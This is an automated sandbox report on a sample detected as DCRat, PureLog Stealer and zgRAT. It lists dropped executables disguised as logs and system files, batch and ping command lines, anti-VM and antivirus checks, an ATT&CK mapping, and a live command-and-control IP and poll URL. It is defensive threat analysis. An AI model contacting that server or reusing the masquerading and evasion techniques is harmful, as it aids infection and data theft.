                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\iMcIJnEg.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\tTxOTVxp.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\fKqanEzl.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\dzUZnmUk.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\akEQlvtX.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\lQyoqXNz.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\QitkawpP.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\WbWKDcuD.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\hyuiZSvj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\TEXjXBsl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\pHpfyUNt.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\jswyQSZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\xJoFaSxi.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuNaeyse.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ICMDMDoc.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\cExRVzrV.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVDTnZnD.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\oYwxMpHv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\ypIvhwSa.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\HpjdguSK.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWLjDtED.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\psJpXhFT.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\FfNcgcmK.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\kiFHFtHC.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\CJjejXjo.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\sdoGeuPL.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\zTtncajv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\MdBcJrhy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\FMWMFGoj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\nbVprpsA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\EzsmZyRR.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\gdhqOayL.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\uzSEaASh.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: 85D5ktqjpd.exe, XWWZQvSvBozA.exe.0.dr, XWWZQvSvBozA.exe0.0.dr, upfc.exe.0.dr, WmiPrvSE.exe.0.dr, ctfmon.exe.0.drBinary or memory string: NbhgFS3MdB
                            Source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA63558 rdtsc 0_2_00007FFD9BA63558
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Users\user\Desktop\85D5ktqjpd.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 85D5ktqjpd.exe PID: 6944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3384, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 85D5ktqjpd.exe PID: 6944, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3384, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 85D5ktqjpd.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.85D5ktqjpd.exe.d70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\ctfmon.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts141
                            Windows Management Instrumentation                            		1
                            Scripting                            		11
                            Process Injection                            		113
                            Masquerading                            		OS Credential Dumping251
                            Security Software Discovery                            		Remote Services1
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop ProtocolData from Removable Media2
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                            Virtualization/Sandbox Evasion                            		Security Account Manager151
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection                            		NTDS1
                            Remote System Discovery                            		Distributed Component Object ModelInput Capture12
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                            Obfuscated Files or Information                            		LSA Secrets1
                            System Network Configuration Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials2
                            File and Directory Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
                            System Information Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589407 Sample: 85D5ktqjpd.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Antivirus detection for dropped file 2->55 57 11 other signatures 2->57 7 85D5ktqjpd.exe 4 48 2->7         started        process3 file4 25 C:\Users\user\Desktop\ypIvhwSa.log, PE32 7->25 dropped 27 C:\Users\user\Desktop\xJoFaSxi.log, PE32 7->27 dropped 29 C:\Users\user\Desktop\uzSEaASh.log, PE32 7->29 dropped 31 35 other malicious files 7->31 dropped 59 Drops executable to a common third party application directory 7->59 11 cmd.exe 1 7->11         started        signatures5 process6 signatures7 61 Uses ping.exe to sleep 11->61 63 Uses ping.exe to check the status of other devices and networks 11->63 14 ctfmon.exe 15 29 11->14         started        19 conhost.exe 11->19         started        21 PING.EXE 1 11->21         started        23 chcp.com 1 11->23         started        process8 dnsIp9 41 91.211.249.46, 49731, 80 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 14->41 33 C:\Users\user\Desktop\zTtncajv.log, PE32 14->33 dropped 35 C:\Users\user\Desktop\yWRfHaUA.log, PE32 14->35 dropped 37 C:\Users\user\Desktop\yOiNcrtu.log, PE32 14->37 dropped 39 24 other malicious files 14->39 dropped 43 Antivirus detection for dropped file 14->43 45 Multi AV Scanner detection for dropped file 14->45 47 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->47 49 Machine Learning detection for dropped file 14->49 file10 signatures11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            85D5ktqjpd.exe62%VirustotalBrowse
                            85D5ktqjpd.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            85D5ktqjpd.exe100%AviraHEUR/AGEN.1339906
                            85D5ktqjpd.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe100%AviraHEUR/AGEN.1339906
                            C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe100%AviraHEUR/AGEN.1339906
                            C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Mozilla Firefox\uninstall\upfc.exe100%AviraHEUR/AGEN.1339906
                            C:\Users\user\Desktop\QitkawpP.log100%AviraTR/AVI.Agent.updqb
                            C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe100%AviraHEUR/AGEN.1339906
                            C:\Users\user\Desktop\HpjdguSK.log100%AviraHEUR/AGEN.1362695
                            C:\Recovery\ctfmon.exe100%AviraHEUR/AGEN.1339906
                            C:\Users\user\Desktop\VWLjDtED.log100%AviraHEUR/AGEN.1300079
                            C:\Users\user\Desktop\MdBcJrhy.log100%AviraHEUR/AGEN.1300079
                            C:\Users\user\Desktop\TEXjXBsl.log100%Joe Sandbox ML
                            C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\VOtkXUXl.log100%Joe Sandbox ML
                            C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe100%Joe Sandbox ML
                            C:\Program Files\Mozilla Firefox\uninstall\upfc.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\LnsTTQzV.log100%Joe Sandbox ML
                            C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\CJjejXjo.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\HpjdguSK.log100%Joe Sandbox ML
                            C:\Recovery\ctfmon.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\HFlvrDZi.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\VWLjDtED.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\ICMDMDoc.log100%Joe Sandbox ML
                            C:\Users\user\Desktop\MdBcJrhy.log100%Joe Sandbox ML
                            C:\Program Files\Mozilla Firefox\uninstall\upfc.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\ctfmon.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\CJjejXjo.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\Cbqwysdq.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\CpWmZfmQ.log29%ReversingLabs
                            C:\Users\user\Desktop\EzsmZyRR.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\FMWMFGoj.log8%ReversingLabs
                            C:\Users\user\Desktop\FfNcgcmK.log8%ReversingLabs
                            C:\Users\user\Desktop\HFlvrDZi.log8%ReversingLabs
                            C:\Users\user\Desktop\HpjdguSK.log17%ReversingLabs
                            C:\Users\user\Desktop\ICMDMDoc.log21%ReversingLabs
                            C:\Users\user\Desktop\JVDTnZnD.log25%ReversingLabs
                            C:\Users\user\Desktop\LEzlimtY.log17%ReversingLabs
                            C:\Users\user\Desktop\LnsTTQzV.log9%ReversingLabs
                            C:\Users\user\Desktop\MdBcJrhy.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\NLuKuVnw.log9%ReversingLabs
                            C:\Users\user\Desktop\QitkawpP.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\RYCtQXXs.log6%ReversingLabs
                            C:\Users\user\Desktop\TEXjXBsl.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\VOtkXUXl.log9%ReversingLabs
                            C:\Users\user\Desktop\VWLjDtED.log17%ReversingLabs
                            C:\Users\user\Desktop\WLUssUmg.log8%ReversingLabs
                            C:\Users\user\Desktop\WbWKDcuD.log4%ReversingLabs
                            C:\Users\user\Desktop\WuNaeyse.log25%ReversingLabs
                            C:\Users\user\Desktop\XYySZcJy.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\ZJdigpUr.log5%ReversingLabs
                            C:\Users\user\Desktop\ZRNAKZux.log12%ReversingLabs
                            C:\Users\user\Desktop\akEQlvtX.log16%ReversingLabs
                            C:\Users\user\Desktop\cExRVzrV.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\cLPQBZYm.log29%ReversingLabs
                            C:\Users\user\Desktop\dzUZnmUk.log3%ReversingLabs
                            C:\Users\user\Desktop\eWmRCrDn.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\fKqanEzl.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\gdhqOayL.log8%ReversingLabs
                            C:\Users\user\Desktop\haIyjaMG.log21%ReversingLabs
                            C:\Users\user\Desktop\hyuiZSvj.log21%ReversingLabs
                            C:\Users\user\Desktop\iMcIJnEg.log8%ReversingLabs
                            C:\Users\user\Desktop\jAgQuBAe.log16%ReversingLabs
                            C:\Users\user\Desktop\jswyQSZZ.log25%ReversingLabs
                            C:\Users\user\Desktop\kiFHFtHC.log17%ReversingLabs
                            C:\Users\user\Desktop\lQyoqXNz.log17%ReversingLabs
                            C:\Users\user\Desktop\nbVprpsA.log4%ReversingLabs
                            C:\Users\user\Desktop\oPZxcDoy.log25%ReversingLabs
                            C:\Users\user\Desktop\oYwxMpHv.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\pHpfyUNt.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\psJpXhFT.log9%ReversingLabs
                            C:\Users\user\Desktop\rIogOAZx.log21%ReversingLabs
                            C:\Users\user\Desktop\sdoGeuPL.log25%ReversingLabs
                            C:\Users\user\Desktop\tTxOTVxp.log5%ReversingLabs
                            C:\Users\user\Desktop\uzSEaASh.log3%ReversingLabs
                            C:\Users\user\Desktop\vdCwVejC.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\xJoFaSxi.log29%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Desktop\yOiNcrtu.log17%ReversingLabs
                            C:\Users\user\Desktop\yWRfHaUA.log25%ReversingLabs
                            C:\Users\user\Desktop\ypIvhwSa.log12%ReversingLabs
                            C:\Users\user\Desktop\zTtncajv.log6%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://91.211.249.460%Avira URL Cloudsafe
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php0%Avira URL Cloudsafe
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.phptrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://91.211.249.46/3vmApi/8/poll2GeneratorPython/ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000002.2931880992.0000000003571000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://91.211.249.46ctfmon.exe, 00000005.00000002.2931880992.00000000035C2000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              91.211.249.46
                              		unknownUkraine
                              		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1589407
                              Start date and time:2025-01-12 09:16:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:85D5ktqjpd.exe
                              renamed because original name is a hash value
                              Original Sample Name:97c2927135dd8fce7d56d5e1b2914bfa.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@10/73@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ON-LINE-DATAServerlocation-NetherlandsDrontenNLgYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.231.69.191
                              1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                              • 91.211.250.247
                              FnTSHWLNWB.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.219.81.132
                              arm.elfGet hashmaliciousMiraiBrowse
                              • 185.235.146.207
                              2BI8rJKpBa.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.219.81.132
                              2AIgdyA1Cl.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.219.81.132
                              1So9BcQi1J.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.219.81.135
                              ZXVcgrmGRM.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.219.81.135
                              6aTAU3Dzp6.exeGet hashmaliciousStealc, VidarBrowse
                              • 92.119.114.51
                              hD7SED8r8Q.exeGet hashmaliciousStealc, VidarBrowse
                              • 45.91.201.185

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\Desktop\CJjejXjo.logOisrvsB6Ea.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
